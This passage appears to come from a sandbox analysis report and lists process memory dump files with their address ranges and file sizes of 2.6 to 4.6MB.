                  • memory/2640-822-0x00000000068C0000-0x0000000006D62000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2640-820-0x00000000068C0000-0x0000000006D62000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2684-791-0x0000000000400000-0x000000000068D000-memory.dmp

                    Filesize

                    2.6MB

                  • memory/3476-1119-0x00000000012A0000-0x00000000016FE000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/3476-1112-0x00000000012A0000-0x00000000016FE000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/3476-1090-0x00000000012A0000-0x00000000016FE000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/3476-1089-0x00000000012A0000-0x00000000016FE000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/3476-1087-0x00000000012A0000-0x00000000016FE000-memory.dmp

                    Filesize

                    4.4MB